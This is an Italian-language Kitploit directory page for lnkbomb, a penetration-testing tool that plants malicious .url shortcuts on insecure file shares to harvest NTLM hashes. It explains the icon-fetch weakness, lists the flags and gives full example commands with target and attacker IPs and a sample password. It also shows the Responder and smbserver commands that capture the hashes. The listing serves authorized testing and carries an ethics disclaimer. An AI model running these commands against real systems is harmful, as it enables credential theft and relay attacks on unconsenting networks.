Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
lnkbomb — Generatore di collegamenti malevoli per la raccolta di hash NTLM da condivisioni di file non sicure. | Kitploit
Strumenti/GitHubGitHub/dievus/lnkbomb
Attacchi alle PasswordExploitMovimento LateraleRaccolta InformazioniPenetration TestingRed TeamingArchived
GitHubdievus/lnkbomb

lnkbomb

Generatore di collegamenti malevoli per la raccolta di hash NTLM da condivisioni di file non sicure.

Vedi Repository
3636271 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Lnkbomb

ko-fi

Lnkbomb è usato per caricare file di collegamento dannosi su condivisioni di file non sicure. La vulnerabilità esiste perché Windows cerca un file icona da associare al file di collegamento. Questo file icona può essere indirizzato alla macchina del penetration tester su cui è in esecuzione Responder o smbserver per raccogliere hash NTLMv1 o NTLMv2 (a seconda della configurazione della macchina vittima). Il tester può quindi tentare di crackare quegli hash raccolti offline con uno strumento come Hashcat, o relayarli a uno strumento come ntlmrelayx per ulteriore sfruttamento.

Il file payload viene caricato direttamente sul file non sicuro specificato dal tester nella riga di comando. Il tester include anche il proprio indirizzo IP, che viene scritto nel payload.

La versione 2.0 è una ricostruzione totale dello strumento e utilizza la libreria pysmb, permettendo il drop di payload non autenticati e autenticati.

Utilizzo Python

Installazione di Lnkbomb

Nota che il progetto funziona in modo coerente su Windows. Potrebbe avere problemi su Linux.

git clone https://github.com/dievus/lnkbomb.git

Spostati nella directory lnkbomb ed esegui:

python3 lnkbomb.py -h

Questo mostrerà il menu di aiuto, che contiene i seguenti flag:

-h, --help - Elenca le opzioni di aiuto

-t, --target - Specifica l'indirizzo IP del target

-a, --attacker - Specifica l'indirizzo IP della macchina attaccante del tester

-r, --recover - Utilizzato per rimuovere il payload al termine del test (es. -r payloadname.url)

-w, --windows - Nuovo comando - necessario per impostare le porte appropriate per le condivisioni Windows

-l, --linux - Nuovo comando - necessario per impostare le porte appropriate per le condivisioni Linux

-n, --netbios - Nuovo comando - il nome netbios per le macchine Windows target deve essere incluso

Esempi di comandi completi includono:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

Dovrai utilizzare uno strumento come Responder o smbserver per catturare l'hash NTLM.
responder -I eth0 -dwFP -v

o

smbserver.py . . -smb2support

Note

Tieni presente che questo strumento è destinato esclusivamente a scopi di hacking etico e penetration testing. Non approvo alcun comportamento che includa test su target per i quali non hai attualmente l'autorizzazione.

Questo strumento potrebbe funzionare o meno a seconda delle patch e delle versioni del target. L'esperienza utente può variare.

So che sono scorciatoie .url e non estensioni .lnk. Lo faccio per provocarti.

Scarica lo strumento